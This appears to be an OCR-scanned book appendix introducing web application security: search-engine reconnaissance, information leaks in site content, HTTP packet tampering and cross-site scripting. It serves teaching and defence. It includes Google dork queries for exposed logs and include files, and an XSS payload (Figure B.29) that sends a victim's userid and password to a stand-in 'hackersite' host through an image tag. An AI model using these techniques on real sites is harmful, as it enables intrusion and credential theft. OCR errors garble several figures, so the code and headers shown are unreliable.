There is no doubt that the advent of the Internet (more specifically, the World Wide Web) has sparked a revolution in how we share information as families, businesses, and world citizens. Perhaps the most important technological invention since the printing press, this one single communication medium holds tomes of information on practically any subject, although that itself is its largest weak-ness.There are now over 54 million sites on the Web1, and search engines are critical to users for finding valuable information on these sites.
Simple Nomad first documented search engine hacking in late 1997 and published a series of papers on how to use his favorite search engine of the time (AltaVista). Although the search engines used have changed, using them to find vulnerabilities in Web sites is still a novel approach, for "Google crawls all"—both the good and the bad. If you can form a query for a particular vulnerability, the chances are that Google can find it. With a little understanding of Web application security, however, you will realize that vulnerabilities in sites go beyond even what can be discovered with a search engine. In this appendix we discuss the basics of these vulnerabilities.
Defining Web Application Security
Web application security (a term often abbreviated to Web app sec) deals with the overall Web application architecture, logic, coding, and content of the Web application. In other words, Web application security isn't about operating system vulnerabilities or the security defects in your commercial products; it's about the vulnerabilities in your own software. As such, it isn't a replacement for existing security practices but rather complements them. Hopefully after reading this chapter you'll have a clear understanding of some Web application vulnerabilities and how the discipline of Web application security is clearly differentiated from what most people typically consider as Web site security. It can help to understand Web app sec by first understanding what it isn't, since the terms Web and application are used broadly in various areas of Internet security. Web application security is not about the following:
■ Trojans or viruses Although firewall manufacturers that have learned how to deal with these often describe their products as providing "application security." Although these products do indeed deal with issues at an application level, they're simply talking about the application level of
the OSI stack, not your Web application. The difference is quite distinct in reality, although it has been heavily blurred in the marketing. There are very few actual Web application firewalls on the market, and they are all quite specialized devices; if the same firewall vendor you've been using for years claims to have an application firewall, dig into the details and ensure that the vendor is actually talking about Web application security and not malware and other application-level attacks.
■ Dealing with Spam That's a whole different can of worms (the worms, of course, being the spammers). It's true that spam occurs at the application layer, but again we're talking about something completely different. The focus of Web application security is not protecting your end users from something traveling over the network; it's about protecting your Web site from being hacked.
■ Web filtering This area is really more concerned with watching outbound Web traffic to make sure an employee isn't surfing using his fantasy football league at work.
■ Known vulnerabilities in the operating system or Web server
Although these vulnerabilities certainly are extremely important and must be addressed, it's a fairly mature space that is well understood. In fact, it is so well understood that one could argue that it put "blinders" on the industry, allowing Web application vulnerabilities to grow and grow with little mitigation until only recently.
The Uniqueness
of Web Application Security
The differences between Web application vulnerabilities and known/server vulnerabilities deserve further discussion. When people talk about vulnerabilities (and vulnerability assessments in particular), the majority of the industry deals with "known vulnerabilities" that homogenously affect every install of the particular version of the affected software. This allows for several luxuries in dealing with these types of vulnerabilities:
■ When a vulnerability is announced, everyone becomes aware of the vulnerability at the same time. Not all vulnerabilities that are discovered are announced, however.
■ Everyone is affected by the vulerability in the same manner, allowing for a single solution to be applied—usually a software patch from the software manufacturer.
■ Since the vulnerability is identical across the board, a single "signature" of it can be created and applied to any number of scanners, firewalls, or intrusion detection devices.
In contrast to these network or OS vulnerabilities, most Web application vulnerabilities aren't "known" vulnerabilities. Since they exist in the Web application, which is almost always custom written, they are unique to that application. Of course, the technique or methodology might be well known (as SQL injection is well known), but not every Web application will be vulnerable to a certain technique, and even the ones that are will be vulnerable in unique areas in different ways.
This has a real impact on how you deal with Web app vulnerabilities; since they're your own custom-built vulnerabilities, you have to deal with them your-self.This means:
■ You won't receive a vulnerability announcement about them.
■ You won't find them indexed in tomes such as Mitre's CVE database or the SANS Top 20 list.
■ These vulnerabilities can exist on any platform (combination of OS and Web server) and can exist regardless of the security of the platform itself.
■ You won't be able to rely on a vendor patch. Again, this is your software, not COTS, so there is absolutely no leveraging the homogenous environment. The exception to these rules are "off-the-shelf" Web applications such as PHPNuke, DotNetNuke, or any number of COTS Web software. When you're using a "canned" Web application, the benefit of a homogenous environment does exist. Of course, the second these applications are modified in the least, they become custom software; and they're almost always modified to some extent.
Web Application Vulnerabilities
Remedying Web application vulnerabilities is not particularly difficult. The challenge instead is that of awareness and testing. The channels that developers are taught and trained conspicuously lack security awareness, and developers are often taught standard techniques that yield insecure code. It is important to point out as well that the majority of Web applications have not been adequately tested for security, if tested at all.The majority of testing on applications is geared toward functionality and performance, which also means that most developers tend to code to those two standards. Only in the last few years have comprehensive scanning solutions been available for testing Web application security. Aside from those few scanners, most of the tools available are either for manual testing or automated for only a tiny portion of what must be tested.This means that most security testing has relied on either penetration testing or code reviews— both of which require significant expertise and are rarely conducted as frequently as necessary to ensure the ongoing security of the application.
Regardless of the reasons, Web application vulnerabilities abound, and this risk is just now being realized. Compared to many forms of hacking, Web application hacking is an extraordinarily easy discipline. Many people who have no clue how to exploit the numerous buffer overflows that are being constantly discovered can skillfully identify and exploit Web app vulnerabilities. Obviously, as this security space matures, the hacking will become less fruitful, but the fact of the matter is that Web hackers have a number of advantages:
■ Web app vulnerabilities get their own rule on the firewall: "Allow HTTP and from any source." In fact, in most firewalls, it's probably the very first rule.2
■ This is a difficult area to effectively and properly monitor with an intrusion detection system. As such, it is rarely monitored properly, if at all.
■ Few tools are required. Many vulnerabilities can be discovered and exploited right from a browser. Those that can't simply require a minimal tool set—typically just a proxy that exposes the raw HTTP packet.
■ Web application vulnerabilities are so easy to discover that people can actually find "opportunity hacks" with a search engine, although we'll discuss the limitations of this approach as it pertains to actual Web application assessments.
As a result, Web applications can be exploited left and right. When you really think about it, this shouldn't come as a surprise. After all, if multibillion-dollar software companieshave trouble securing their software, why wouldn't smaller, lesser trained shops with significantly less access to resources have the same problems? The answer, of course, is that their software—the Web applications—are just as insecure; these companies just don't realize it.
Web application vulnerabilities exist in many areas, and understanding those areas is critical to understanding Web app sec.The Top 10 Web Application Vulnerabilities list by the Open Web Application Security Project (www.owasp.org) is perhaps the oldest and most established list of Web application vulnerabilities. It's often cited in papers and Web sites and is a great place to start learning the various types of Web application threats. However, it's not an attempt to enumerate and classify all possible vulnerabilities; it's a running list of what the project members perceive to be the most important Web application threats at the time of writing, much as is the SANS Top 20 list.
There are documents that attempt to classify the full realm of Web application threats.The OASIS WAS Vulnerability Types and Vulnerability Ranking Model does an excellent job of organizing vulnerability types into a model that is particularly useful for referencing very specific issues. Likewise, the Web Application Security Consortium (http://www.webappsec.org) published its Threat Classification paper as an organizational model as well. Read both papers, as well as other sources, to learn the sum total of Web application threats out there. (Some resources are listed at the end of this chapter.) Here is a sample of some general types of Web application vulnerabilities:
■ Authentication issues These refer to things such as login mechanisms, preventing password theft through mechanisms such as "Lost Password" features, and ensuring that all "secure" content actually requires authentication. This area has received a lot of attention over the years, and some fairly standard practices have evolved, though they are often debated.
■ Session management This is a very important area, dealing with problems such as preventing session spoofing by predicting credentials (i.e., sessions IDs) and ensuring that application features that require higher access properly check the authorization level of the user. Several recent publicized hacks were the result of weak session management.
■ Command injection These are the result of the application accepting input from the browser (whether it's input that the user typed in or input that the programmer passed from a previous page) that allows the attacker to insert commands and execute them. These commands can range from database queries (such as in the case of SQL injection) to
JavaScript (as in cross-site scripting) or even actual system commands. The impact of these is often devastating. Note that command execution is not limited to system commands; even just the ability to insert HTML into a page could be used to hack successfully.
■ Information disclosure There are lots of clues in Web sites that help a hacker, from HTML comments to finding complete software manuals on the system (yes, this happens all the time). Although any single incident of information disclosure by itself is rarely useful for a complete hack; these incidents often have a damaging cumulative effect.
Note that this is by no means a complete list of all possible Web application vulnerabilities; it is merely a start. Web applications have the potential to be infinitely complex, and thus do their vulnerabilities; be sure to read the papers mentioned in this chapter to learn more about the full scope of vulnerabilities and threats.
For the purposes of this appendix, we'll abstract the issues even higher, relating them to the content and code of the site. What we're labeling as "content issues" are those vulnerabilities that appear in the actual page itself; they are "standalone" vulnerabilities that don't require any real understanding of how the application works. In contrast, "code" issues exist in the server-side code for the page and require actually exercising the logic for that page to see what you can get away with in it.You can use search engines to find symptoms of code-related errors: for instance, certain ODBC errors can be indicative of SQL injection, but to truly determine if the vulnerability does indeed exist (and the extent of it), you have to make follow-on requests with specially formed packets to test it.
Even with strictly content issues, a search engine will not expose the full gamut of issues. Search engines crawl and index by very specific rules to ensure that they "play nicely" with Web sites, and this limits the amount of content you can find through them.
Constraints of Search-Engine Hacking
This book has already given a very good picture of exactly what can be found just in the content. But it's important to also understand the constraints of search engine hacking. Certainly using a search engine will find targets of opportunity, but when you're talking about actually doing a concerted test on a target system, you need to understand that anything you turn up using a search engine is just
the tip of the iceberg. To put this in graphical terms, Figure B.1 displays the subset of vulnerabilities that are exposed to Google.
Figure B.1 Only a Subset of Vulnerabilities Is Exposed to Google
First, not all sites are crawled by Google.That's hard to believe, but remember that for every public Web application any sizable company has (and has submitted to Google to crawl), many others are either not on the Web at all or are not public Web sites. These could include the strictly internal Web applications within a company or extranets that are external facing but meant for an extremely limited audience.
Even of the sites Google does crawl, not all of each site will be crawled. Google can only follow linked pages, and it doesn't do any guessing at filenames or follow clues to other files. Not even all linked files are followed; certainly those linked with HTML links are, but JavaScript links might not necessarily be followed, and pages that can only be found via a form submission won't be found at all. Additionally, Google politely respects requests not to crawl certain areas, as indicated in the robots.txt file.
All this means that although lots of serious information can be garnered using search engines, this form of hacking is by no means the complete picture of Web application security. In fact, even just in the realm of content there's a lot
of information (and vulnerabilities) that a human can find but a search engine would probably miss.
Information and Vulnerabilities in Content
The first thing to realize about content is that it takes many forms. A typical Web page will obviously contain HTML that is rendered in the browser,but additional information in the page source can be valuable to a hacker or penetration tester. JavaScript, comments, and hidden form fields all yield clues and can even be manipulated to actively test the application. Page-scraping techniques, such as those covered throughout this book, can be used to extend the results of a search to get to this type of data.
However, beyond the page source, a great deal of information is available in the raw HTTP itself——status codes, headers, and post data are all valuable areas that are not exposed in the browser. Typically, a crawl is the starting point to discover as much of the site as possible. Additional work will almost always yield more content to scrutinize; this could be a dictionary attack that simply requests a list of files, or it could involve manually poking around and requesting files. More often than not, it's a combination of the two. Although actual vulnerabilities can be discovered in content, for the most part the biggest value comes in information disclosures.
The Fast Road to Directory Enumerations
Some files save a hacker a lot of reconnaissance work by giving him or her a complete list of additional content to analyze. Some of the most obvious files that yield lots of good directory and/or filenames are the robots.txt file, FTP logs, and Web traffic reports, although obviously others can exist as well.These techniques are all covered in detail throughout this book, but we present them in brief here, firmly placed within the context of a Web application assessment.
Robots.txt
Robots.txt is a plaintext file. Of course, even more can be unearthed by examining the raw packets that tell search engines where they can and can't crawl. This file is always plaintext and is always stored in the root of the Web site—that is, at www.wefe5ffe.com/roots.txt. For this reason, it's a great way to start off your searching.
Robots.txt is a simple file: It specifies a user agent and directories that are either explicitly allowed or disallowed. It is very useful for quickly identifying interesting areas of the application because if a search engine is explicitly told not to search a certain directory, a hacker would certainly want to know why. Take, for example, Figure B.2, in which we see the robots.txt file from Google.com. There are several interesting directory names that search engines have been told not to crawl, one of which is the /catalogs directory. By manually browsing google.com/catalogs, you'll see that this is a beta application that might not have been otherwise detected.
Of course, the robots.txt file has to be manually created, meaning that the system designers should be well aware of the fact that they're advertising those directory names. However, the search results are far more interesting to the hacker when the designers and administrators are not aware of certain directories he or she has located.
FTP Log Files
Log files are also an incredible source of additional directories and filenames to check, as we've seen throughout this book, especially in Chapter 10. Frequently these are FTP log files, although any type of logging or trace file that's viewable
to the public is a liability. FTP logs in particular give the hacker that many more files to look for and can also reveal such things as the system name, client IP address, or even the internal IP address of the system.Think about who FTPs to a Web server—most likely someone with privileges, and if that IP traces back to a residential line, an alternative target comes to light: a system that will probably be considerably less defended but has plenty of access to the Web site.
Never allow log files of any type to gather on a server in the Webroot, because they won't attract dust. Figure B.3 shows a quick Google search for a very common FTP log filename. Some of these files were intentionally placed by the administrators, but surely most were not.
Figure B.3 Google Search Results for a Common FTP Log File
Results 1 - 10 of about 255,000 for allinurl:"ws_ftp.log" [0.73 seconds)
Web Traffic Reports
Web traffic reports, explored in Chapter 10, are also a highly valuable source of information to the hacker.These are reports generated by specialized software that analyzes the Web traffic logs to generate easily digestible information about the Web traffic. In particular, most reports show not only the most popular pages but the least popular as well. This almost always presents some interesting areas to be explored.Think contrarian here; if you have a public Web site that takes hundreds of thousands of hits a day, but some pages only take several hundred hits a day, what function do you think those pages play within the Web application? They could be a remote Web-based admin section or perhaps a separate section for customer service representatives to log into and access higher functionality. Either way, chances are they'll be a good source of information, and in some cases, extreme vulnerabilities can be found in these stats.
HTML Comments
HTML comments are also a great source of information, not just for finding more content but about the system itself and more. Many developers are still leaving "TMI"—too much information—in their client-side comments. For example, some commonly seen ones include:
■ Directory names or filenames
■ References to server-side code
■ Documenting template pages
■ References to installed applications or systems
■ Revision history
■ Internal names or contact information (many companies use the same naming conventions for their logins as they do their e-mail)
■ Revision history
Error Messages
Error messages are another phenomenal source of information, as we've seen throughout this book, highlighted in Chapters 8 and lO.They're all over the Web and often overlooked by untrained eyes. Every error message tells a story, and they're flashing neon signs that say "my site is broken." Hackers will almost always stop to see exactly how broken. These messages can also reveal large amounts of sensitive information such as file system paths, additional content, internal code, and more. Most extremely useful error messages are generated with active testing (tampering with the application), but many can be found with a crawl as well. In Figure B.4, an error message reveals the file system path, along with information about the server-side code.
Figure B.4 Error Message Revealing the Web Root and Other Details
#cookie.contactid# I Error near line 27, column 21.
Error resolving parameterCOOKIE.CONTACTID
The cookie value CONTACTID was not found in the current template file. The cause of this error is very likely one of the following things:
1.The name ofthe cookie variable has been misspelled.
2.The cookie variable has notyet been created or has timed out.
To set default values for cookie variables you should use the CFPARAM tag (e.g. )
The error occurred while processing an element with a general identifier of (#cookie.contactid#), occupying document position (27:20) to (27:37) in the template file D:yNETPUB\WWWROO"nDISPLAY\.ASITES\1 203Uu\MEMBERSLISTING.CFM.
Sample Files
Sample files or other commonly used applications such as those revealed in Chapter 8 typically have well-documented vulnerabilities in them. Many sample files are actually remote tools for the developers, and others might simply demonstrate the system's features.
Bad Extensions
Another common mistake that can have devastating consequences is simply misnaming a file extension, as we explored in Chapter 3. Extensions are mapped in the Web server, and this is how they know a page is supposed to be executed on the server as opposed to simply sent to the browser. Any page that contains server-side code requires an extension that the server will recognize and will execute.
Figure B.5 shows the application mappings for Internet Information Server; here it is clear that the Web server relies on proper extensions to understand how to process a file.
With the wrong extension, the server will simply send the text file to the browser, completely revealing the server-side source code. Unfortunately, many
developers have actually been trained to give their files nonexecutable extensions, particularly server-side include files (.inc files). Figure B.6 shows the results of a query asking for a very common filename given to the files that define database connectivity in certain PHP applications. Although the number of hits might sound low, remember that this is only one specific filename, and these all had to be exposed to Google via directory browsing to be indexed. In reality, a huge number of include files with the .inc extension are running in Web applications right now.
Figure B.6 Include Files Are a Common Source of Server-Side Code
Results 1 - 10 of about 147 for intitle:"lndex of" "dbconn.inc". (0.35 seconds) fc
Most dictionary attacks ask for commonly used include files, but this attack isn't limited to include files by any means; any page that contains server-side code that has the wrong extension on it will leak that source code. Likewise, any archive files left on the server (such as tarballs or ZIP files) are subject to download along with their contents, whether HTML or code. Figures B.7 and B.8 show how a copy of a file with an improper extension reveals its source code. Since the extension .bak doesn't correlate with any application mappings, the server doesn't realize that the page is supposed to be executed and performs a "read" operation on it instead—yielding its source code to the lucky viewer. Note that although the examples here show Active Server Pages running on Internet Information Server, this issue is by no means limited to that platform; this page is chosen merely for the sake of demonstration.These issues exist on all platforms, including Java and PHP applications.
System Documentation
System documentation of one form or another can also often be found on sites, as we discussed in Chapter 8.This documentation is usually in the form of Readme files but can also be complete online manuals. Although these might be helpful while developing a system, they must not be on anything in production. The same can be said for test files: Remember that these are pages where a developer was testing something, and these pages are usually broken. The error messages gleaned from these pages can be amazingly helpful because they tend to slip under the radar of any administrative housekeeping.
These were just some choice examples of frequently occurring issues. Obviously there's no limit to the amount ofjunk that collects on a Web server over time; chalk it up to poor housekeeping or just "Internet entropy." When you're fishing for files, use your imagination, but naturally, prioritize items that will help you further the testing.
Defending your site from these content issues is easy once you understand the impact even relatively benign items can have. In general, a few basic practices can help mitigate content-related issues:
■ Ensure that all files have a script extension, even if the page only contains HTML. For example, ASP code in an HTML file will not be executed, it will be displayed to the browser, but an .asp file that only contains HTML will still serve the HTML fine.
■ Clean up your Web directories. Ensure that only intended pages are present, and delete anything that doesn't belong, especially sample applications. On most systems it's pretty easy to pick out the files that don't belong. When in doubt, ask the developers.
■ Disallow HTML comments in code. Allow only server-side comments. If the page is only HTML and requires a comment, insert a server-side comment within script delimiters, such as:
Text and stuff
More text and stuff and a that won't make it to the browser.
Of course, this works only if you run everything with a script extension.
■ Be aware of what is transmitted in your cookies and post data. Even though these aren't readily viewable in a browser, they are immediately apparent to a hacker, as we'll see later.
Hidden Form Fields,
JavaScript, and Other Client-Side Issues
A large number of mechanisms are available to the developer in the client-side code, such as hidden form fields and JavaScript; there are well-known issues with these as well. For example, many developers use hidden form fields for everything from session identifiers to view state controls. None of these are issues if done properly; the fact that a session ID is in a hidden form, for example, doesn't make the identifier itself any more or less secure than if it appeared in the URL.
However, many developers actually still believe that hidden form fields are actually hidden from the user. Unfortunately, this couldn't be further from the truth.They are called "hidden" because they don't render in the browser view, but they are quite plainly accessible in the HTML source and raw packets. In the late 1990s "client-side pricing"—hidden form fields that actually passed the price of an item from page to page in the shopping cart—was common. By simply saving the HTML to disk and modifying it, a hacker could actually change the price of a product when checking out. Sadly, this exact issue still exists today, but in extremely limited numbers of occurrences compared to the past.
The old-fashioned way of manipulating content was to save the Web page to disk, modify the local file, and use it to submit a modified request to the server. This, however, is a terribly mundane way of going about it. It all gets so much easier when you drill down to the packet level. Additionally, a great deal of information is exposed in the packet that simply isn't available without viewing the raw packet. Before getting into any real code attacks, you have to understand how HTTP packets work and how to manipulate them to directly submit tampered data to the Web application.
Playing with Packets
All communication between the browser and server is done via HTTP requests and responses. As an application-level protocol, HTTP is wrapped into lower-level protocols, so you don't need to worry about them. Every time you load a Web page into your browser, the browser makes multiple requests to the server as
it downloads images, scripts, and other elements. When you submit a form, the browser submits the data you've entered, along with any hidden form values and any possible effects ofJavaScript, to the server in a request, almost always via either a GET or a POST.
An HTTP GET passes information to the server by appending the information to the end of the page name as show in Figure B.9. In a POST request, however, the information is not appended to the URL but is rather submitted in the body of the request packet, as shown in Figure B.10. Many developers believe that POST requests are actually more secure than GETs because the information is not exposed in the address bar of the browser. In reality, a POST is just as exposed as a GET in the packet and equally subject to tampering. There is, however, one distinct difference between a GET and a POST: data persistency. Anything in a URL (such as querystring information from a GET) can persist in many areas far beyond the Web developer's control. These include:
■ The browser's history cache
■ The browser's bookmarks
■ Any outbound proxy logs
■ Any inbound proxy logs
■ Any firewall logs
■ Web server logs
■ Web server traffic reports (which read the server logs)
■ Referrer strings, which could actually send the information to a different site
Therefore, it is always a good idea for any Web forms to submit via a POST instead of a GET. This is merely to avoid this issue of the data living everywhere, however, and does absolutely nothing to secure the data.
Figure B.9 An HTTP GET Packet
GET /browse.asp?Departrnent=Mens&Aisle=8hirtsS
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040614 Firefox/0.9 StumbleUpon/1.995 Accept: teKt/xml,application/KmLapplication/>:html+xmLteKt/html;q=0.9,te>:t/plain;q=0.8Jmage/png,"/";q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip.deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,";q=0.7 Keep-Alive: 300
Cookie: Q 29uZ3J hdH VsYXR pb25zl C4uLiB 5b3U gYXJ II HZIcnkgM TMzNw==| Connection: Close
Figure B.10 An HTTP POST Packet
POST /browse.aspHTTPAI.O Host: www.onlineretailer.com
User-Agent: Mozilla/5.0 [Windows; U; Windows NT 5.0: en-US: rv:1.7) Gecko/20040614 Firefon/0.9 StumbleUpon/l.995 Accept: rewr/wmLapplication/Hrnl.applicarion/Hhrml+wml.reHt/hrrnl;q=0.S.reHr/plain;q=0.8jrnageypng.K/K;q=0.5 Accept-Language: en-us.en;q=0.5 Accept-Encoding: gzip.deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,";q=0.7 Keep-Alive: 300
Cookie: eT N^l G wzM zduM zU 11G Izl G Ny dWM kN G w= Connection: Close Content-Length: 39
Department=Mens&Aisle=SNrts&Color=Eilue
In both a GET and a POST, the information is a concatenated string composed of a parameter name and the value of that parameter. Some fairly standard delimiters are used to help the server interpret the data, as shown in Figure B.11.
By intercepting packets from the browser, you can see all form data submitted, including hidden form field values and the effects of any JavaScript that executed.
Not all information is transmitted via queries and post data, however. A Web application developer has full access to all areas of the packet and will often store information in the cookie or even go so far as to create custom headers to store data. All areas of the packet are subject to viewing and tampering, and performing it at packet level is easy and efficient. Figure B.12 shows a raw request with an interesting cookie being sent to the server.
Figure B.12 An HTTP Request Showing a Cookie Transmitted to the Server
GET /test2.asp HTTP/1.0 Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7] Gecko/20040914 Firefon/0.9 StunnbleUpon/1.995
Accept: text/Kml,application/Kml,application/xhtrnl+Kml,teKt/html;q=0.9,text/plain;q=0.8,image/prig,"/";q=0.5
Accept-Language: en-us,en;q=0.5
Accept-E needing: gzip.deflate
Accept-Charset: 19 0 -9859-1 ,utf-8;q=0.7,";q=0.7
Keep-Alive: 300
Connection: Close
Cookie: auth=admin^3D false?26authlevleK3D 1; AS PS E S S10 Nl D ASD S AASB=M AKJ PI I CI EJ N G J M E AN E PAH 6 L
Viewing and Manipulating Packets
Before you can begin modifying packets, you have to actually get access to them. As we know, the browser will only display the URL (and any accompanying querystring) and the body (the HTML) or the HTTP response.The only portion of an HTTP request that is displayed is the URL and querystring itself; POST statements are not viewable in a browser.
There are several ways of viewing the actual raw packets themselves.The first method that comes to mind for most people is packet sniffing, which will indeed show you the full conversation between browser and server. A favored packet sniffer is Ethereal, pictured in Figure B.13, which displays the packets in an easily read format.
Be prepared, however, to sift through a large number of packets because the server response can actually take place over multiple packets. If you're using Ethereal, be sure to take advantage of its filtering and coloring rules to sort the chaff from the wheat.
At some point, you'll need to actually modify the packets, not just view them, and this takes more than a sniffer.There are several different ways of modifying packets, and both are used extensively. For a "one-off" request, simple Telnet will do the trick; simply Telnet to the server on port 80 (or the appropriate port), type in your packet, and terminate the packet with two carriage returns; the server will respond accordingly. Typing in packets by hand gets old quickly, however, and to perform repetitive tasks you'll want to script out the work.
When nothing but manual tampering will do, nothing beats using a local proxy. Local proxies can be garnered from many sources, but they all basically do the same thing: let you view and modify raw HTTP packets. The real differentiators are in details such as the ability to chain through a network proxy, the ability to use SSL, and the ability to modify response packets in addition to request packets. Most have extremely functional interfaces as well, combining all packets and matching responses to their requests. They work by simply accepting the packet from your browser, displaying the packet to you for modification, then forwarding it to the server and displaying the server response.
By letting the browser make the request for you, all you have to do is modify the area you're interested in.This is extremely efficient in complex applications that can change key areas with each request—now your browser does all the heavy lifting, leaving you free to tweak where desired. Some proxies will even allow you to search and replace packet contents automatically.
Figure B.14 shows SPI Proxy configured to automatically remove all Cookie and Referer headers and to modify the User-Agent header. Being able to modify the raw packet automatically is a great benefit—one application we played with had a "maximum login attempts" counter in its cookies; by configuring the filters in the proxy, we automatically reset the counter to the maximum with each request and was able to pound the login fields all we wanted. Of course, just maintaining that count in the client is an issue unto itself.
Once you have the ability to actually modify packets, you're on your way to actively testing for logical vulnerabilities. Unfortunately, there's simply no way to give a full education on all the myriad possibilities that exist in exploiting application logic, for they are as diverse as the applications themselves. In the next section, however, we look at some basic examples of well-known vulnerabilities and exploits.
Code Vulnerabilities in Web Applications
The majority of really serious vulnerabilities in Web application don't occur in the "content" level per se; they're based on exploiting failures in the logic of the server-side code. These are more difficult to discover because they require actually exercising the application in various ways to determine the behavior of the back-end code.
Client-Side Attacks
When you visit a Web page, the main HTML file comes from that server but can reference elements that are spread across the Internet. Advertisements, streaming media, images, and other objects are often hosted aside via caching services that reduce the total bandwidth consumed by the main site. Browsers know to load these within the main page, even though their source is offsite. This behavior, although required for the Web to work properly, can expose the browser to many different attacks known as client-side attacks.
Client-side attacks can occur in many forms; drive-by ActiveX downloads is one example, as is a malicious Java applet on a Web site. These are all attacks from the Web site itself; the owner of the site is attacking the hapless users of it. Rarely will the owners of these systems engage a penetration tester or auditor! There are, however, plenty of legitimate Web sites that have vulnerabilities that allow a malicious third party to use the sites to attack browsers. Instead of trying to break into an application head-on to get inside and steal sensitive information, the attacks target the users of that application to gain access to information.
Client-side attacks are often carried out through some sort of phishing scam: sending out extremely convincing-looking e-mails that try to attract people to a mock Web site that mimics a well-known real site and then get them to enter their private information into the mock Web site. These scammers typically employ a variety of URL obfuscation techniques to hide their true identity.This type of attack requires no vulnerability on the actual Web application; rather, it is sheer deception. The weakness in this type of attack is that a sharp consumer might take notice of the suspicious URL, recognizing that it doesn't belong to the real organization.
Recently, a bank's customers were being phished with a different type of attack that took advantage of a vulnerability in the real bank's Web application— one called cross-site framing. In this case, the phishing attack didn't need to employ a mock Web site; instead it sent the victims to the real bank Web site, a trusted domain. The phishers exploited a page that intentionally displayed third-party content.The location of the content to be displayed in the frame was specified in the URL, as demonstrated in Figure B.15.There are ways to do this safely by examining the location specified within the server-side code to ensure that the URL passed to the page is legitimate, but in this case the needed validation wasn't performed and the page would load into the frame any content that was specified in the URL.The phishers then created a mock login form on another site and specified the location of that form in the URL, as demonstrated in Figure B.16. Now the phishers'Web site was framed within the original site.
By phishing that URL around through legitimate-looking e-mails, the scam-mers then attempted to dupe the bank's actual victims into logging into their form. Figure B.17 shows the modified URL that can now be used in the phish bait. Note that the host and domain is the original site, so even a consumer who scrutinizes those still stands a chance at being fooled.
Подпись: Figure B.17 HTTP Response That Suggests Susceptibility to Cross-Site Scripting
This classic example of a client-side attack demonstrates some key characteristics of such attacks:
■ They don't attack the site directly but rather indirectly through the users of the site.
■ They typically trick the main site into interacting with a third party by injecting some form of content.
■ They get to levy the trust between the users and the main site, since the third-party interaction is done by the actual, real site and not a fake one.
This particular vulnerability is relatively rare, since few sites frame third-party sites and actually embed the full URLs into their queries. A much more commonly found vulnerability is cross-site scripting (abbreviated XSS). Cross-site scripting exists when the Web site accepts input that it shouldn't (as in the previous example) but then sends that input back to the browser. This could be in a login page, where the username is displayed back to the browser, or a search field, where the search terms are displayed but can actually exist anywhere.
For example, look at the request and response in Figure B.17. We see that the page cklogin.asp takes the value supplied for the Userid parameter and displays that value back in the page.This is the first test necessary to identify XSS; finding the replay where input is echoed back as output. For this to be an actual XSS vulnerability, however, it must accept and replay the JavaScript without performing any validation on it.
The simplest way to test for this is to simply enter script into the parameter and see if it is echoed back to the browser. Figure B.18 shows a request packet being modified; the legitimate value for the parameter named userid is replaced with a simple Java script.
Figure B.18 also demonstrates encoding the parameters. When manipulating packets directly, you must remember that the content-length header has to be updated to reflect the new length of the post data string. It might also be necessary to encode the input. Web browsers do this for you automatically, and any packet editor you use should allow you to do this as well.
After you've injected the script into the request, simply analyze the response. If the script comes back in the response unmodified, that parameter is vulnerable to cross-site scripting. Figure B.19 shows the script returned in our example response.The application intends to write "Welcome Back [username]" but instead writes "Welcome Back [Java Script]" since it believes the actual username is the JavaScript expression.
Escaping from Literal Expressions
If you can get a complete script returned in an HTTP response, the request parameter that was tested is vulnerable. Often, however, the script itself won't execute in the browser, because it was returned inside a literal statement. The server-side code returns the script, but it's in some element the browser only recognizes as HTML and not as script. For instance, in Figure B.20, we see our test script returned, but this time inside an image tag. To get this script to properly execute, we need to escape the tag.
Figure B.21 illustrates prefacing the injected script with the characters necessary to close the existing tag. This then separates the script from the tag, but the remainder of the tag is now "stranded" and will print on the screen as illustrated in Figure B.22.This, along with the "broken image" icon, certainly won't suffice in a proper hack—they must be cleaned up.
The first task is removing the "giant red X" (which indicates the existence of a broken image link) from the screen. Figure B.23 shows prefacing the injection not just with the "> combination necessary to escape the tag but now with a height and width specification that ensures the icon isn't shown at all. At the end of the injection, a metatag is opened. In the response we can see that we have successfully shrunk and closed the image, creating a nicely formed invisible tag. Figure B.24 shows the rendered results—which are, of course, completely blank now.
There are other ways of executing script as well. For instance, you can specify a remote script, as shown in Figure B.25, or instead embed the script into the image tag as shown in Figure B.26.
Once the injection is tested and confirmed, the actual attack needs to be formed.The JavaScript Document Object Model (DOM) provides several extremely useful capabilities to the developer and hacker alike. For instance, JavaScript provides access to field values and is often used by developers to
ensure that required information has been entered into forms. This same functionality also lets the hacker access information entered into the form via a cross-site scripting attack, as demonstrated in Figures B.27 and B.28.
Figure B.27 The Injected Script
The next step is to get the information where it can be read. This is usually done by appending it to an image tag whose source is a remote Web server that the hacker has access to, as shown in Figure B.29. When the script is activated, the browser will attempt to load the image, making a call to the remote server with the stolen information in it. From there, the hacker simply has to read the Web logs for the stolen information.You can also use JavaScript to redirect windows and open new windows and create framesets, all of which could display forged login pages. Figures B.30 and B.31 show an example of appending the form values to a window.open command; this is an elaborate example of the various fun to be had with cross-site scripting.
An Introduction to Web Application Security • Appendix B Figure B.29 Passing Credentials to the Third-Party Site Via an Image Tag
userid=" onmouseover=''document, write-dmg height=0 width=0
src='http: //hackersite/'+docurnent. login, userid. value+' == '+docurnent. login, password. value)"> "&:password=doh! nuts
Figure B.30 Appending Form Values to a window.open Command
Cross-site scripting made big waves a few years ago when it was discovered in several popular Web-based e-mail providers. XSS is still unfortunately a very common vulnerability in Web applications. Defensive coding techniques require
strong validation of all input for script tags and certain terms, as well as HTML encoding any printed output that is directly received from the browser.
Remember that anything that occurs on that page and is accessible via JavaScript is subject to theft via cross-site scripting. If the vulnerability occurs on a page that requests a username and password, those credentials are subject to theft. However, even if the page doesn't have any actual sensitive forms on it, the cookie itself can often be a big help to the hacker, since most cookies contain session identifiers that can be used to impersonate another user.
Session Hijacking
HTTP is a stateless protocol, and Web applications have no automatic way of knowing what has happened from one page to the next.This functionality must be built into the application by the developer and is typically done through the use of a session identifier. A session ID is essentially a serial number that identifies an individual to the site; it is given by the system at a user's an initial visit and is offered up to the server by the browser on each subsequent request. The system looks up all pertinent information related to that session ID, then makes appropriate decisions based on it, such as to allow access to a certain page or to display certain items in the online shopping cart.
